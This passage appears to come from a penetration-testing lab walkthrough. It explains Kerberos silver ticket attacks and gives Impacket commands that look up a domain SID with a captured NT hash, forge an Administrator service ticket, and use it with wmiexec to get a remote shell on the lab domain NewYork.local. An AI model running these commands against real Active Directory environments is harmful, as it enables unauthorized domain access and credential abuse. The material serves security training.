Silver ticket

Silver ticket attacks use this authentication to forge ticket granting service (TGS) tickets. A forged service ticket is encrypted with the service account's key and grants access to resources for the specific service targeted by the silver ticket attack.

What a silver ticket attack shares with other ticket attacks is the abuse of weaknesses in Kerberos. The related Kerberoasting technique harvests password hashes for Active Directory user accounts by exploiting the Kerberos protocol. Kerberos is a network security protocol that authenticates service requests using secret-key cryptography. In addition to the silver ticket, the golden ticket and diamond ticket also attack this weakness.

  • Another way to get a shell is by creating a silver ticket:

  • Find the domain SID:

lookupsid.py -hashes ':4434b2874a45816ce75c971df2187ca6' 'NewYork.local'/'NYC$'@NYC.NewYork.local 0

  • Create the silver ticket:

ticketer.py -nthash '4434b2874a45816ce75c971df2187ca6' -domain-sid 'S-1-5-21-1209695003-1472128694-59720954' -domain NewYork.local -spn cifs/NYC.NewYork.local Administrator

And use it:

export KRB5CCNAME=/workspace/acl/Administrator.ccache
wmiexec.py -k -no-pass NewYork.local/administrator@NYC.NewYork.local

OK, the fun with the NewYork.local domain is over; now let’s try some ACL abuse in the other domains.
